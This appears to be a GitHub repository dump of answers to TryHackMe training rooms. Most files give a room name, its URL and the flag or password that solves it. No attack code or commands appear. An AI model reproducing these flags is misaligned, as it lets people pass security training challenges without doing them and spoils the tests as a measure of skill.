├── rooms ├── owasp mutillidae II.txt ├── dvwa.txt ├── webgoat.txt ├── brainpan 1.txt ├── kali machine.txt ├── koth food ctf.txt ├── koth hackers.txt ├── windows base.txt ├── careers in cyber.txt ├── heist.txt ├── learn and win prizes.txt ├── outlook ntlm leak.txt ├── 0x41haz.txt ├── compiled.txt ├── flip.txt ├── intro to iot pentesting.txt ├── the game.txt ├── heartbleed.txt ├── passcode.txt ├── flag vault 2.txt ├── flag vault.txt ├── agent t.txt ├── bugged.txt ├── classic passwd.txt ├── containme.txt ├── introduction to aws iam.txt ├── md2pdf.txt ├── corridor.txt ├── team.txt ├── the game v2.txt ├── capture!.txt ├── precision.txt ├── prioritise.txt ├── 0day.txt ├── cyberheroes.txt ├── hackfinity battle.txt ├── lo-fi.txt ├── takeover.txt ├── void execution.txt ├── dig dug.txt ├── lesson learned.txt ├── robots.txt ├── committed.txt ├── git happens.txt ├── rabbit hole.txt ├── security footage.txt ├── a bucket of phish.txt ├── epoch.txt ├── intermediate nmap.txt ├── source.txt ├── surfer.txt ├── templates.txt ├── capture returns.txt ├── dear qa.txt ├── ide.txt ├── internal.txt ├── mr. phisher.txt ├── openvpn.txt ├── tech_supp0rt 1.txt ├── annie.txt ├── dav.txt ├── debug.txt ├── eavesdropper.txt ├── filepeek.txt ├── ignite.txt ├── island orchestration.txt ├── magician.txt ├── neighbour.txt ├── next.js cve-2025-29927.txt ├── sudo buffer overflow.txt ├── cve-2023-38408.txt ├── empline.txt ├── chronicle.txt ├── confidential.txt ├── gamebuzz.txt ├── motunui.txt ├── overlayfs - cve-2021-3493.txt ├── the sticker shop.txt ├── welcome.txt ├── wgel ctf.txt ├── willow.txt ├── blueprint.txt ├── bookstore.txt ├── cold vvars.txt ├── develpy.txt ├── expose.txt ├── ledger.txt ├── library.txt ├── madness.txt ├── relevant.txt ├── the blob blog.txt ├── the impossible challenge.txt ├── thompson.txt ├── anonforce.txt ├── brute.txt ├── burp suite extensions.txt ├── enterprize.txt ├── hack back.txt ├── iron corp.txt ├── keldagrim.txt ├── safezone.txt ├── sea surfer.txt ├── services.txt ├── airplane.txt ├── billing.txt ├── creative.txt ├── jacob the boss.txt ├── metamorphosis.txt ├── mindgames.txt ├── misguided ghosts.txt ├── pyrat.txt ├── reset.txt ├── smol.txt ├── spring4shell cve-2022-22965.txt ├── valley.txt ├── athena.txt ├── carpe diem 1.txt ├── cyberlens.txt ├── dirty pipe cve-2022-0847.txt ├── lookup.txt ├── ollie.txt ├── road.txt ├── temple.txt ├── unbaked pie.txt ├── weasel.txt ├── wekor.txt ├── zeno.txt ├── cat pictures.txt ├── gatekeeper.txt ├── kitty.txt ├── mkingdom.txt ├── plotted-tms.txt ├── rabbit store.txt ├── racetrack bank.txt ├── second.txt ├── all in one.txt ├── biteme.txt ├── brooklyn nine nine.txt ├── bypass disable functions.txt ├── chill hack.txt ├── git and crumpets.txt ├── haskhell.txt ├── hijack.txt ├── inferno.txt ├── mustacchio.txt ├── peak hill.txt ├── publisher.txt ├── revenge.txt ├── whyhackme.txt ├── year of the dog.txt ├── year of the owl.txt ├── aster.txt ├── avenger.txt ├── extracted.txt ├── hc0n christmas ctf.txt ├── jax sucks alot..............txt ├── lockdown.txt ├── opacity.txt ├── smag grotto.txt ├── tor.txt ├── aratus.txt ├── bandit.txt ├── biblioteca.txt ├── gamingserver.txt ├── lazyadmin.txt ├── looking glass.txt ├── lumberjack turtle.txt ├── plotted-lms.txt ├── takedown.txt ├── toc2.txt ├── tomghost.txt ├── tryhack3m burg3r bytes.txt ├── tutorial.txt ├── attacking ics plant #2.txt ├── dodge.txt ├── exfilibur.txt ├── flatline.txt ├── looney tunables.txt ├── u.a. high school.txt ├── wwbuddy.txt ├── year of the jellyfish.txt ├── colddbox easy.txt ├── frank and herby try again......txt ├── moebius.txt ├── mountaineer.txt ├── oh my webserver.txt ├── w1seguy.txt ├── el bandito.txt ├── ldap injection.txt ├── silver platter.txt ├── stealth.txt ├── tempus fugit durius.txt ├── vulnnet.txt ├── enterprise.txt ├── forgotten implant.txt ├── hammer.txt ├── jack-of-all-trades.txt ├── fortress.txt ├── napping.txt ├── sudo security bypass.txt ├── cheese ctf.txt ├── devie.txt ├── dx1 liberty island.txt ├── fowsniff ctf.txt ├── hacker vs. hacker.txt ├── jack.txt ├── nonamectf.txt ├── rocket.txt ├── vulnnet node.txt ├── cmess.txt ├── jpgchat.txt ├── vulnnet dotjar.txt ├── vulnnet dotpy.txt ├── whats your name.txt ├── decryptify.txt ├── for business reasons.txt ├── year of the rabbit.txt ├── dreaming.txt ├── dx2 hells kitchen.txt ├── fusion corp.txt ├── harder.txt ├── localpotato.txt ├── plotted-emr.txt ├── ra.txt ├── set.txt ├── battery.txt ├── erlang otp ssh cve-2025-32433.txt ├── overpass.txt ├── red stone one carat.txt ├── the server from hell.txt ├── hack smarter security.txt ├── include.txt ├── mr robot ctf.txt ├── vulnnet active.txt ├── palsforlife.txt ├── snowy armageddon.txt ├── vulnnet roasted.txt ├── wonderland.txt ├── year of the pig.txt ├── cat pictures 2.txt ├── cherryblossom.txt ├── en-pass.txt ├── glitch.txt ├── hydra.txt ├── red.txt ├── whiterose.txt ├── anonymous playground.txt ├── breakme.txt ├── injectics.txt ├── madeyes castle.txt ├── nerdherd.txt ├── umbrella.txt ├── undiscovered.txt ├── envizon.txt ├── light.txt ├── overpass 3 - hosting.txt ├── thats the ticket.txt ├── the london bridge.txt ├── windows privesc arena.txt ├── retro.txt ├── weaponization.txt ├── obscure.txt ├── pickle rick.txt ├── brainstorm.txt ├── python playground.txt ├── spring.txt ├── startup.txt ├── lookback.txt ├── olympus.txt ├── pylon.txt ├── year of the fox.txt ├── you got mail.txt ├── examinerx9.txt ├── dockmagic.txt ├── getting started.txt ├── the marketplace.txt ├── the witchs cauldron.txt ├── vulnnet endgame.txt ├── ad badsuccessor.txt ├── certain doom.txt ├── super secret tip.txt ├── break out the cage.txt ├── reloaded.txt ├── the great escape.txt ├── backtrack.txt ├── introduction to owasp zap.txt ├── memory forensics.txt ├── scripting.txt ├── gotta catchem all!.txt ├── tryhack3m tricipher summit.txt ├── baron samedit.txt ├── binary heaven.txt ├── blog.txt ├── pwnkit cve-2021-4034.txt ├── the bandit surfer.txt ├── crypto failures.txt ├── linux backdoors.txt ├── minotaurs labyrinth.txt ├── osiris.txt ├── simplehelp cve-2024-57727.txt ├── starting out in cyber sec.txt ├── stuxctf.txt ├── bounty hacker.txt ├── dogcat.txt ├── geolocating images.txt ├── learning cyber security.txt ├── shaker.txt ├── b3dr0ck.txt ├── breaking crypto the simple way.txt ├── hip flask.txt ├── request smuggling websockets.txt ├── tomcat cve-2024-50379.txt ├── convertmyvideo.txt ├── ra 2.txt ├── theseus.txt ├── frank & herby make an app.txt ├── chocolate factory.txt ├── atlas.txt ├── different ctf.txt ├── basic malware re.txt ├── daves blog.txt ├── sqhell.txt ├── youre in a cave.txt ├── binex.txt ├── daily bugle.txt ├── intro to graphql hacking.txt ├── cyborg.txt ├── kubernetes for everyone.txt ├── dll hijacking.txt ├── gallery.txt ├── how to use tryhackme.txt ├── race conditions challenge.txt ├── ssti.txt ├── sustah.txt ├── become a hacker.txt ├── offensive security intro.txt ├── crocc crew.txt ├── recovery.txt ├── watcher.txt ├── enumeration & brute force.txt ├── polkit cve-2021-3560.txt ├── phishing hiddeneye.txt ├── empire.txt ├── vulnnet internal.txt ├── hamlet.txt ├── broker.txt ├── unstable twin.txt ├── skynet.txt ├── clocky.txt ├── sts credentials lab.txt ├── rootme.txt ├── security operations.txt ├── lian_yu.txt ├── chrome.txt ├── introduction to django.txt ├── uranium ctf.txt ├── cooctus stories.txt ├── ghizer.txt ├── lunizz ctf.txt ├── ohsint.txt ├── bebop.txt ├── brains.txt ├── super-spam.txt ├── traffic analysis essentials.txt ├── training impact on teams.txt ├── trypwnme two.txt ├── windows reversing intro.txt ├── junior security analyst intro.txt ├── anonymous.txt ├── confluence cve-2023-22515.txt ├── introduction to flask.txt ├── ninja skills.txt ├── cct2019.txt ├── grep.txt ├── vulnerability capstone.txt ├── adventure time.txt ├── gitlab cve-2023-7028.txt ├── the quest for least privilige.txt ├── advent of cyber 23 side quest.txt ├── aws vpc - data exfiltration.txt ├── moniker link (cve-2024-21413).txt ├── archangel.txt ├── basic pentesting.txt ├── breaking rsa.txt ├── network security.txt ├── mnemonic.txt ├── mothers secret.txt ├── security awareness.txt ├── server-side template injection.txt ├── idor.txt ├── the return of the yeti.txt ├── nanocherryctf.txt ├── new york flankees.txt ├── res.txt ├── atlassian cve-2022-26134.txt ├── amazon ec2 - data exfiltration.txt ├── block.txt ├── defensive security intro.txt ├── avengers blog.txt ├── corp.txt ├── frosteau busy with vim.txt ├── iam credentials.txt ├── soar.txt ├── tshark challenge i teamwork.txt ├── resource policies & scps.txt ├── snort challenge - live attacks.txt ├── tokyo ghoul.txt ├── printer hacking 101.txt ├── putting it all together.txt ├── intro to endpoint security.txt ├── signature evasion.txt ├── ret2libc.txt ├── walking an application.txt ├── kiba.txt ├── sweettooth inc..txt ├── alfred.txt ├── jurassic park.txt ├── tshark.txt ├── intranet.txt ├── openvas.txt ├── cryptography basics.txt ├── insekube.txt ├── misp.txt ├── sighunt.txt ├── boiler ctf.txt ├── brute it.txt ├── tryhack3m bricks heist.txt ├── profiles.txt ├── pwn101.txt ├── common attacks.txt ├── reversing elf.txt ├── runtime detection evasion.txt ├── hackernote.txt ├── splunk basics.txt ├── windows privesc.txt ├── cicada-3301 vol1.txt ├── multi-factor authentication.txt ├── http request smuggling.txt ├── red team threat intel.txt ├── simple ctf.txt ├── buffer overflows.txt ├── cyber scotland 2021.txt ├── writing pentest reports.txt ├── burp suite repeater.txt ├── ad basic enumeration.txt ├── aws iam enumeration.txt ├── length extension attacks.txt ├── ultratech.txt ├── bolt.txt ├── container vulnerabilities.txt ├── agent sudo.txt ├── post-exploitation basics.txt ├── web application security.txt ├── thehive project.txt ├── intro to detection engineering.txt ├── seetwo.txt ├── summit.txt ├── tony the tiger.txt └── cors & sop.txt ├── picture.jpg └── koth ├── space jam.txt ├── production.txt ├── hogwarts.txt ├── tyler.txt ├── fortune.txt ├── h1-medium.txt ├── shrek.txt ├── food.txt ├── offline.txt └── hackers.txt /rooms/owasp mutillidae II.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /picture.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thmrevenant/tryhackme/HEAD/picture.jpg -------------------------------------------------------------------------------- /rooms/dvwa.txt: -------------------------------------------------------------------------------- 1 | DVWA 2 | https://tryhackme.com/room/dvwa 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/webgoat.txt: -------------------------------------------------------------------------------- 1 | WebGOAT 2 | https://tryhackme.com/room/webgoat 3 | 4 | No answer needed -------------------------------------------------------------------------------- /koth/space jam.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | 218f5ea7a4d711eef60171e5c92ba9e1 3 | 79973eb57d0188ffc6c85a1a4e57a516 -------------------------------------------------------------------------------- /rooms/brainpan 1.txt: -------------------------------------------------------------------------------- 1 | Brainpan 1 2 | https://tryhackme.com/room/brainpan 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/kali machine.txt: -------------------------------------------------------------------------------- 1 | Kali Machine 2 | https://tryhackme.com/room/kali 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/koth food ctf.txt: -------------------------------------------------------------------------------- 1 | KoTH Food CTF 2 | https://tryhackme.com/room/kothfoodctf 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/koth hackers.txt: -------------------------------------------------------------------------------- 1 | KoTH Hackers 2 | https://tryhackme.com/room/kothhackers 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/windows base.txt: -------------------------------------------------------------------------------- 1 | Windows Base 2 | https://tryhackme.com/room/windowsbase 3 | 4 | No answer needed 5 | -------------------------------------------------------------------------------- /rooms/careers in cyber.txt: -------------------------------------------------------------------------------- 1 | Careers in Cyber 2 | https://tryhackme.com/room/careersincyber 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/heist.txt: -------------------------------------------------------------------------------- 1 | Heist 2 | https://tryhackme.com/room/hfb1heist 3 | 4 | What is the flag? 5 | THM{web3_h31st_d0ne} 6 | -------------------------------------------------------------------------------- /rooms/learn and win prizes.txt: -------------------------------------------------------------------------------- 1 | Learn and win prizes 2 | https://tryhackme.com/room/tickets1 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/outlook ntlm leak.txt: -------------------------------------------------------------------------------- 1 | Outlook NTLM Leak 2 | https://tryhackme.com/room/outlookntlmleak 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/0x41haz.txt: -------------------------------------------------------------------------------- 1 | 0x41haz 2 | https://tryhackme.com/room/0x41haz 3 | 4 | What is the password? 5 | THM{2@@25$gfsT&@L} 6 | -------------------------------------------------------------------------------- /rooms/compiled.txt: -------------------------------------------------------------------------------- 1 | Compiled 2 | https://tryhackme.com/room/compiled 3 | 4 | What is the password? 5 | DoYouEven_init 6 | -------------------------------------------------------------------------------- /rooms/flip.txt: -------------------------------------------------------------------------------- 1 | Flip 2 | https://tryhackme.com/room/flip 3 | 4 | What is the flag? 5 | THM{FliP_DaT_B1t_oR_G3t_Fl1pP3d} 6 | -------------------------------------------------------------------------------- /rooms/intro to iot pentesting.txt: -------------------------------------------------------------------------------- 1 | Intro to IoT Pentesting 2 | https://tryhackme.com/room/iotintro 3 | 4 | No answer needed -------------------------------------------------------------------------------- /rooms/the game.txt: -------------------------------------------------------------------------------- 1 | The Game 2 | https://tryhackme.com/room/hfb1thegame 3 | 4 | What is the flag? 5 | THM{I_CAN_READ_IT_ALL} 6 | -------------------------------------------------------------------------------- /rooms/heartbleed.txt: -------------------------------------------------------------------------------- 1 | HeartBleed 2 | https://tryhackme.com/room/heartbleed 3 | 4 | What is the flag? 5 | THM{sSl-Is-BaD} 6 | -------------------------------------------------------------------------------- /rooms/passcode.txt: -------------------------------------------------------------------------------- 1 | PassCode 2 | https://tryhackme.com/room/hfb1passcode 3 | 4 | What is the flag? 5 | THM{web3_h4ck1ng_code} 6 | -------------------------------------------------------------------------------- /koth/production.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | 04461ad0759944a4d743deec6bbd8d54 3 | 06380baf84b7f9a8161e1642d4771251 4 | eabe4da21f519b8d6726427df7e683c5 -------------------------------------------------------------------------------- /rooms/flag vault 2.txt: -------------------------------------------------------------------------------- 1 | Flag Vault 2 2 | https://tryhackme.com/room/hfb1flagvault2 3 | 4 | What is the flag? 5 | THM{format_issues} 6 | -------------------------------------------------------------------------------- /rooms/flag vault.txt: -------------------------------------------------------------------------------- 1 | Flag Vault 2 | https://tryhackme.com/room/hfb1flagvault 3 | 4 | What is the flag? 5 | THM{password_0v3rfl0w} 6 | -------------------------------------------------------------------------------- /rooms/agent t.txt: -------------------------------------------------------------------------------- 1 | Agent T 2 | https://tryhackme.com/room/agentt 3 | 4 | What is the flag? 5 | flag{4127d0530abf16d6d23973e3df8dbecb} 6 | -------------------------------------------------------------------------------- /rooms/bugged.txt: -------------------------------------------------------------------------------- 1 | Bugged 2 | https://tryhackme.com/room/bugged 3 | 4 | What is the flag? 5 | flag{18d44fc0707ac8dc8be45bb83db54013} 6 | -------------------------------------------------------------------------------- /rooms/classic passwd.txt: -------------------------------------------------------------------------------- 1 | Classic Passwd 2 | https://tryhackme.com/room/classicpasswd 3 | 4 | What is the flag? 5 | THM{65235128496} 6 | -------------------------------------------------------------------------------- /rooms/containme.txt: -------------------------------------------------------------------------------- 1 | ContainMe 2 | https://tryhackme.com/room/containme1 3 | 4 | What is the flag? 5 | THM{_Y0U_F0UND_TH3_C0NTA1N3RS_} 6 | -------------------------------------------------------------------------------- /rooms/introduction to aws iam.txt: -------------------------------------------------------------------------------- 1 | Introduction to AWS IAM 2 | https://tryhackme.com/room/introductiontoawsiam 3 | 4 | No answer needed 5 | -------------------------------------------------------------------------------- /rooms/md2pdf.txt: -------------------------------------------------------------------------------- 1 | MD2PDF 2 | https://tryhackme.com/room/md2pdf 3 | 4 | What is the flag? 5 | flag{1f4a2b6ffeaf4707c43885d704eaee4b} 6 | -------------------------------------------------------------------------------- /rooms/corridor.txt: -------------------------------------------------------------------------------- 1 | Corridor 2 | https://tryhackme.com/room/corridor 3 | 4 | What is the flag? 5 | flag{2477ef02448ad9156661ac40a6b8862e} 6 | -------------------------------------------------------------------------------- /rooms/team.txt: -------------------------------------------------------------------------------- 1 | Team 2 | https://tryhackme.com/room/teamcw 3 | 4 | user.txt 5 | THM{6Y0TXHz7c2d} 6 | 7 | root.txt 8 | THM{fhqbznavfonq} 9 | -------------------------------------------------------------------------------- /rooms/the game v2.txt: -------------------------------------------------------------------------------- 1 | The Game v2 2 | https://tryhackme.com/room/hfb1thegamev2 3 | 4 | What is the flag? 5 | THM{MEMORY_CAN_CHANGE_4R34L$-$} 6 | -------------------------------------------------------------------------------- /rooms/capture!.txt: -------------------------------------------------------------------------------- 1 | Capture! 2 | https://tryhackme.com/room/capture 3 | 4 | What is the value of flag.txt? 5 | 7df2eabce36f02ca8ed7f237f77ea416 6 | -------------------------------------------------------------------------------- /rooms/precision.txt: -------------------------------------------------------------------------------- 1 | Precision 2 | https://tryhackme.com/room/hfb1precision 3 | 4 | What is the flag? 5 | THM{t4k3_a_chance_with_precision_THMpwn} 6 | -------------------------------------------------------------------------------- /rooms/prioritise.txt: -------------------------------------------------------------------------------- 1 | Prioritise 2 | https://tryhackme.com/room/prioritise 3 | 4 | What is the flag? 5 | flag{65f2f8cfd53d59422f3d7cc62cc8fdcd} 6 | -------------------------------------------------------------------------------- /rooms/0day.txt: -------------------------------------------------------------------------------- 1 | 0day 2 | https://tryhackme.com/room/0day 3 | 4 | user.txt 5 | THM{Sh3llSh0ck_r0ckz} 6 | 7 | root.txt 8 | THM{g00d_j0b_0day_is_Pleased} 9 | -------------------------------------------------------------------------------- /rooms/cyberheroes.txt: -------------------------------------------------------------------------------- 1 | CyberHeroes 2 | https://tryhackme.com/room/cyberheroes 3 | 4 | Uncover the flag! 5 | flag{edb0be532c540b1a150c3a7e85d2466e} 6 | -------------------------------------------------------------------------------- /rooms/hackfinity battle.txt: -------------------------------------------------------------------------------- 1 | Hackfinity Battle 2 | https://tryhackme.com/room/HackfinityBattle 3 | 4 | 44 Thanks for Playing! 5 | THM{thanks_for_playing} 6 | -------------------------------------------------------------------------------- /rooms/lo-fi.txt: -------------------------------------------------------------------------------- 1 | Lo-Fi 2 | https://tryhackme.com/room/lofi 3 | 4 | Climb the filesystem to find the flag! 5 | flag{e4478e0eab69bd642b8238765dcb7d18} 6 | -------------------------------------------------------------------------------- /rooms/takeover.txt: -------------------------------------------------------------------------------- 1 | TakeOver 2 | https://tryhackme.com/room/takeover 3 | 4 | What's the value of the flag? 5 | flag{beea0d6edfcee06a59b83fb50ae81b2f} 6 | -------------------------------------------------------------------------------- /rooms/void execution.txt: -------------------------------------------------------------------------------- 1 | Void Execution 2 | https://tryhackme.com/room/hfb1voidexecution 3 | 4 | What is the flag? 5 | THM{a_void_in_the_memory_c0de} 6 | -------------------------------------------------------------------------------- /rooms/dig dug.txt: -------------------------------------------------------------------------------- 1 | Dig Dug 2 | https://tryhackme.com/room/digdug 3 | 4 | Retrieve the flag from the DNS server! 5 | flag{0767ccd06e79853318f25aeb08ff83e2} 6 | -------------------------------------------------------------------------------- /rooms/lesson learned.txt: -------------------------------------------------------------------------------- 1 | Lesson Learned? 2 | https://tryhackme.com/room/lessonlearned 3 | 4 | What's the flag? 5 | THM{aab02c6b76bb752456a54c80c2d6fb1e} 6 | -------------------------------------------------------------------------------- /rooms/robots.txt: -------------------------------------------------------------------------------- 1 | Robots 2 | https://tryhackme.com/room/robots 3 | 4 | What is the value of the user flag? 5 | 6 | 7 | What is the value of the root flag? 8 | -------------------------------------------------------------------------------- /rooms/committed.txt: -------------------------------------------------------------------------------- 1 | Committed 2 | https://tryhackme.com/room/committed 3 | 4 | Discover the flag in the repository! 5 | flag{a489a9dbf8eb9d37c6e0cc1a92cda17b} 6 | -------------------------------------------------------------------------------- /rooms/git happens.txt: -------------------------------------------------------------------------------- 1 | Git Happens 2 | https://tryhackme.com/room/githappens 3 | 4 | Find the Super Secret Password 5 | Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd! 6 | -------------------------------------------------------------------------------- /rooms/rabbit hole.txt: -------------------------------------------------------------------------------- 1 | Rabbit Hole 2 | https://tryhackme.com/room/rabbitholeqq 3 | 4 | What is the flag? 5 | THM{this_is_the_way_step_inside_jNu8uJ9tvKfH1n48} 6 | -------------------------------------------------------------------------------- /rooms/security footage.txt: -------------------------------------------------------------------------------- 1 | Security Footage 2 | https://tryhackme.com/room/securityfootage 3 | 4 | What is the flag? 5 | Flag{5ebf457ea66b2877fdbca2de9ec86f31} 6 | -------------------------------------------------------------------------------- /rooms/a bucket of phish.txt: -------------------------------------------------------------------------------- 1 | A Bucket of Phish 2 | https://tryhackme.com/room/hfb1abucketofphish 3 | 4 | What is the flag? 5 | THM{this_is_not_what_i_meant_by_public} 6 | -------------------------------------------------------------------------------- /rooms/epoch.txt: -------------------------------------------------------------------------------- 1 | Epoch 2 | https://tryhackme.com/room/epoch 3 | 4 | Find the flag in this vulnerable web application! 5 | flag{7da6c7debd40bd611560c13d8149b647} 6 | -------------------------------------------------------------------------------- /rooms/intermediate nmap.txt: -------------------------------------------------------------------------------- 1 | Intermediate Nmap 2 | https://tryhackme.com/room/intermediatenmap 3 | 4 | Find the flag! 5 | flag{251f309497a18888dde5222761ea88e4} 6 | -------------------------------------------------------------------------------- /rooms/source.txt: -------------------------------------------------------------------------------- 1 | Source 2 | https://tryhackme.com/room/source 3 | 4 | user.txt 5 | THM{SUPPLY_CHAIN_COMPROMISE} 6 | 7 | root.txt 8 | THM{UPDATE_YOUR_INSTALL} 9 | -------------------------------------------------------------------------------- /rooms/surfer.txt: -------------------------------------------------------------------------------- 1 | Surfer 2 | https://tryhackme.com/room/surfer 3 | 4 | Uncover the flag on the hidden application page. 5 | flag{6255c55660e292cf0116c053c9937810} 6 | -------------------------------------------------------------------------------- /rooms/templates.txt: -------------------------------------------------------------------------------- 1 | Templates 2 | https://tryhackme.com/room/templates 3 | 4 | Hack the application and uncover a flag! 5 | flag{3cfca66f3611059a0dfbc4191a0803b2} 6 | -------------------------------------------------------------------------------- /rooms/capture returns.txt: -------------------------------------------------------------------------------- 1 | Capture Returns 2 | https://tryhackme.com/room/capturereturns 3 | 4 | What is the value of flag.txt? 5 | THM{7af71c3b1658eb524cc856d9c9aaf852} 6 | -------------------------------------------------------------------------------- /rooms/dear qa.txt: -------------------------------------------------------------------------------- 1 | Dear QA 2 | https://tryhackme.com/room/dearqa 3 | 4 | What is the binary architecture? 5 | x64 6 | 7 | What is the flag? 8 | THM{PWN_1S_V3RY_E4SY} 9 | -------------------------------------------------------------------------------- /rooms/ide.txt: -------------------------------------------------------------------------------- 1 | IDE 2 | https://tryhackme.com/room/ide 3 | 4 | user.txt 5 | 02930d21a8eb009f6d26361b2d24a466 6 | 7 | root.txt 8 | ce258cb16f47f1c66f0b0b77f4e0fb8d 9 | -------------------------------------------------------------------------------- /rooms/internal.txt: -------------------------------------------------------------------------------- 1 | Internal 2 | https://tryhackme.com/room/internal 3 | 4 | User.txt Flag 5 | THM{int3rna1_fl4g_1} 6 | 7 | Root.txt Flag 8 | THM{d0ck3r_d3str0y3r} 9 | -------------------------------------------------------------------------------- /rooms/mr. phisher.txt: -------------------------------------------------------------------------------- 1 | Mr. Phisher 2 | https://tryhackme.com/room/mrphisher 3 | 4 | Uncover the flag in the email attachment! 5 | flag{a39a07a239aacd40c948d852a5c9f8d1} 6 | -------------------------------------------------------------------------------- /rooms/openvpn.txt: -------------------------------------------------------------------------------- 1 | OpenVPN 2 | https://tryhackme.com/room/openvpn 3 | 4 | What is the flag displayed on the deployed machine's website? 5 | flag{connection_verified} 6 | -------------------------------------------------------------------------------- /rooms/tech_supp0rt 1.txt: -------------------------------------------------------------------------------- 1 | Tech_Supp0rt: 1 2 | https://tryhackme.com/room/techsupp0rt1 3 | 4 | What is the root.txt flag? 5 | 851b8233a8c09400ec30651bd1529bf1ed02790b 6 | -------------------------------------------------------------------------------- /koth/hogwarts.txt: -------------------------------------------------------------------------------- 1 | Flags 2 | THM{Albus_Perciva1_Wu1fric_Brian_Dumb1ed0re} 3 | THM{its_wingardium_laviosaa_Ron} 4 | THM{Yeah_1_swallowed_the_sn1tch.} 5 | THM{I_unarm3d_dumbled0re} -------------------------------------------------------------------------------- /rooms/annie.txt: -------------------------------------------------------------------------------- 1 | Annie 2 | https://tryhackme.com/room/annie 3 | 4 | What is user.txt? 5 | THM{N0t_Ju5t_ANY_D3sk} 6 | 7 | What is root.txt? 8 | THM{0nly_th3m_5.5.2_D3sk} 9 | -------------------------------------------------------------------------------- /rooms/dav.txt: -------------------------------------------------------------------------------- 1 | Dav 2 | https://tryhackme.com/room/bsidesgtdav 3 | 4 | user.txt 5 | 449b40fe93f78a938523b7e4dcd66d2a 6 | 7 | root.txt 8 | 101101ddc16b0cdf65ba0b8a7af7afa5 9 | -------------------------------------------------------------------------------- /rooms/debug.txt: -------------------------------------------------------------------------------- 1 | Debug 2 | https://tryhackme.com/room/debug 3 | 4 | user.txt 5 | 7e37c84a66cc40b1c6bf700d08d28c20 6 | 7 | root.txt 8 | 3c8c3d0fe758c320d158e32f68fabf4b 9 | -------------------------------------------------------------------------------- /rooms/eavesdropper.txt: -------------------------------------------------------------------------------- 1 | Eavesdropper 2 | https://tryhackme.com/room/eavesdropper 3 | 4 | What is the flag in root's home directory? 5 | flag{14370304172628f784d8e8962d54a600} 6 | -------------------------------------------------------------------------------- /rooms/filepeek.txt: -------------------------------------------------------------------------------- 1 | FilePeek 2 | https://tryhackme.com/room/filepeek 3 | 4 | User Flag! 5 | THM{hmm!_got_user} 6 | 7 | Root Flag! 8 | THM{Congratulations_for_root!_LFI_Learned} 9 | -------------------------------------------------------------------------------- /rooms/ignite.txt: -------------------------------------------------------------------------------- 1 | Ignite 2 | https://tryhackme.com/room/ignite 3 | 4 | User.txt 5 | 6470e394cbf6dab6a91682cc8585059b 6 | 7 | Root.txt 8 | b9bbcb33e11b80be759c4e844862482d 9 | -------------------------------------------------------------------------------- /rooms/island orchestration.txt: -------------------------------------------------------------------------------- 1 | Island Orchestration 2 | https://tryhackme.com/room/islandorchestration 3 | 4 | What is the flag? 5 | flag{08bed9fc0bc6d94fff9e51f291577841} 6 | -------------------------------------------------------------------------------- /rooms/magician.txt: -------------------------------------------------------------------------------- 1 | magician 2 | https://tryhackme.com/room/magician 3 | 4 | user.txt 5 | THM{simsalabim_hex_hex} 6 | 7 | root.txt 8 | THM{magic_may_make_many_men_mad} 9 | -------------------------------------------------------------------------------- /rooms/neighbour.txt: -------------------------------------------------------------------------------- 1 | Neighbour 2 | https://tryhackme.com/room/neighbour 3 | 4 | Find the flag on your neighbor's logged in page! 5 | flag{66be95c478473d91a5358f2440c7af1f} 6 | -------------------------------------------------------------------------------- /rooms/next.js cve-2025-29927.txt: -------------------------------------------------------------------------------- 1 | Next.js: CVE-2025-29927 2 | https://tryhackme.com/room/nextjscve202529927 3 | 4 | What is the flag on the protected page? 5 | THM{NEXT_MDLE_JS} 6 | -------------------------------------------------------------------------------- /rooms/sudo buffer overflow.txt: -------------------------------------------------------------------------------- 1 | Sudo Buffer Overflow 2 | https://tryhackme.com/room/sudovulnsbof 3 | 4 | What's the flag in /root/root.txt? 5 | THM{buff3r_0v3rfl0w_rul3s} 6 | -------------------------------------------------------------------------------- /rooms/cve-2023-38408.txt: -------------------------------------------------------------------------------- 1 | CVE-2023-38408 2 | https://tryhackme.com/room/cve202338408 3 | 4 | What is the alice flag.txt? 5 | THM{CURIOUS_ALICE_LEARNED_NO_WONDERLAND_FOR_HACKERS} 6 | -------------------------------------------------------------------------------- /rooms/empline.txt: -------------------------------------------------------------------------------- 1 | Empline 2 | https://tryhackme.com/room/empline 3 | 4 | User.txt 5 | 91cb89c70aa2e5ce0e0116dab099078e 6 | 7 | Root.txt 8 | 74fea7cd0556e9c6f22e6f54bc68f5d5 9 | -------------------------------------------------------------------------------- /rooms/chronicle.txt: -------------------------------------------------------------------------------- 1 | Chronicle 2 | https://tryhackme.com/room/chronicle 3 | 4 | user.txt 5 | 7ba840222ecbdb57af4d24eb222808ad 6 | 7 | root.txt 8 | f21979de76c0302154cc001884143ab2 9 | -------------------------------------------------------------------------------- /rooms/confidential.txt: -------------------------------------------------------------------------------- 1 | Confidential 2 | https://tryhackme.com/room/confidential 3 | 4 | Uncover and scan the QR code to retrieve the flag! 5 | flag{e08e6ce2f077a1b420cfd4a5d1a57a8d} 6 | -------------------------------------------------------------------------------- /rooms/gamebuzz.txt: -------------------------------------------------------------------------------- 1 | GameBuzz 2 | https://tryhackme.com/room/gamebuzz 3 | 4 | user.txt 5 | d14def35ed0bd914c1c5881fa0fa8090 6 | 7 | root.txt 8 | 9dcb607e31348671de36b9eb7446cb59 9 | -------------------------------------------------------------------------------- /rooms/motunui.txt: -------------------------------------------------------------------------------- 1 | Motunui 2 | https://tryhackme.com/room/motunui 3 | 4 | What is the user flag? 5 | THM{m0an4_0f_M0tunu1} 6 | 7 | What is the root flag? 8 | THM{h34rT_r35T0r3d} 9 | -------------------------------------------------------------------------------- /rooms/overlayfs - cve-2021-3493.txt: -------------------------------------------------------------------------------- 1 | OverlayFS - CVE-2021-3493 2 | https://tryhackme.com/room/overlayfs 3 | 4 | What's the flag in /root/? 5 | thm{27aaa5865a52dcd4cb04c0e0a2d39404} 6 